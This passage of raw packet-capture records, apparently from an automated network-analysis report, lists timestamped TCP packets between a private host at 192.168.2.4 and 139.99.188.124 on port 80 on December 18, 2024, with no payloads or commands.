                                                          Dec 18, 2024 09:32:36.011044025 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.011902094 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.012094021 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.012140989 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.012933969 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.013071060 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.013120890 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.013988018 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.014094114 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.014141083 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.014997959 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.015120029 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.015166044 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.016045094 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.016149998 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.016211987 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.017076015 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.017179012 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.017225027 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.018127918 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.018227100 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.018276930 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.019213915 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.019224882 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.019273996 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.022624016 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.022792101 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.022846937 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.023164988 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.023232937 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.023274899 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.024194002 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.024332047 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.024374008 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.025250912 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.025345087 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.025387049 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.026396036 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.026480913 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.026525974 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.027523041 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.027595043 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.027642012 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.028331995 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.028465986 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.028508902 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.029429913 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.029490948 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.029531956 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.030477047 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.030586958 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.030633926 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.031644106 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.031721115 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.031764030 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.032660961 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.032747030 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.032788992 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.033562899 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.033632994 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.033678055 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.034579992 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.034662962 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.034704924 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.035629988 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.035726070 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.035773039 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.036662102 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.036746979 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.036793947 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.037688017 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.037801981 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.037853003 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.038749933 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.038860083 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.038912058 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.039866924 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.039880037 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.039927006 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.040800095 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.040900946 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.040950060 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.041841030 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.041941881 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.041990042 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.042892933 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.042985916 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.043041945 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.043917894 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.044013023 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.044063091 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.045070887 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.045116901 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.045165062 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.046103001 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.046196938 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.046242952 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.047106981 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.047291994 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.047350883 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.048116922 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.048234940 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.048281908 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.049144983 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.049267054 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.049315929 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.050204992 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.050282001 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.050335884 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.051207066 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.051335096 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.051393986 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.052242994 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.052408934 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.052462101 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.053265095 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.053414106 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.053459883 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.054332018 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.054444075 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.054497004 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.055434942 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.055530071 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.055577993 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.056416035 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.056433916 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.056484938 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.057465076 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.057571888 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.057620049 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.058523893 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.058621883 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.058670044 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.059516907 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.108978033 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.194250107 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.194338083 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.194387913 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.194922924 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.195008993 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.195059061 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.196043015 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.196371078 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.196430922 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.196465969 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.197305918 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.197360992 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.197366953 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.198143005 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.198225975 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.198266983 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.199157953 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.199214935 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.199253082 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.200264931 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.200277090 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.200315952 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.201247931 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.201323986 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.201338053 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.202261925 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.202321053 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.202390909 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.203331947 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.203385115 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.203418970 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.204369068 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.204416037 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.204480886 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.205483913 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.205538988 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.205605030 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.206577063 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.206635952 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.206686974 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.207928896 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.207978964 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.208030939 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.209285021 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.209366083 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.209456921 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.210336924 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.210387945 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.210406065 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.211227894 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.211276054 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.214193106 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.214358091 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.214406967 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.214571953 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.214778900 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.214823008 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.214838982 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.215722084 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.215765953 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.215816975 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.216597080 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.216644049 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.216670036 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.217547894 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.217597008 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.217658043 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.228669882 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.228734016 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.228802919 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.229135990 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.229192019 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.229260921 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.230230093 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.230285883 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.230336905 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.231163979 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.231209993 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.231323957 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.232455969 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.232505083 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.232511044 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.233366966 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.233431101 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.233434916 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.234461069 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.234529972 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.234577894 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.235549927 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.235598087 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.235599995 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.236376047 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.236430883 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.236715078 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.237623930 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.237672091 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.237690926 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.238595963 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.238619089 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.238646984 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.239475965 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.239525080 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.239567041 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.240530968 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.240580082 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.240663052 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.241616011 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.241663933 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.241836071 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.242646933 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.242719889 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.242842913 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.243726015 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.243774891 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.243777990 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.244663954 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.244716883 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.245043993 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.245759964 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.245807886 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.245886087 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.246758938 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.246808052 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.246860981 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.247771978 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.247823954 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.247919083 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.248858929 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.248924971 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.248929977 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.249927998 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.249985933 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.250008106 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.250925064 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.250977039 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.251043081 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.251986980 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.252001047 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.252043962 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.253022909 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.253078938 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.253689051 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.254113913 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.254163027 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.254342079 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.255057096 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.255109072 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.255165100 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.256083012 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.256151915 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.312788010 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.321886063 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.570755005 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:37.366951942 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:37.486521959 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:37.486628056 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:37.486903906 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:37.609154940 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:38.999053955 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:38.999083042 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:38.999105930 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:38.999195099 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:38.999212027 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:38.999222994 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:38.999257088 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:38.999265909 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:38.999306917 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:38.999366999 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:38.999392033 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:38.999403954 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:38.999434948 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:38.999623060 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:38.999665022 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.119072914 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.119087934 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.119148016 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.213016987 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.213054895 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.213116884 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.217129946 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.217209101 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.217256069 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.225541115 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.225583076 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.225625992 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.234003067 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.234076023 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.234123945 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.242363930 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.242475986 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.242527962 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.251019955 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.251122952 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.251178980 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.259183884 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.259345055 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.259393930 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.267612934 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.267705917 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.267765999 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.276144028 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.276155949 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.276209116 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.284427881 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.284549952 CET8049731139.99.188.124192.168.2.4
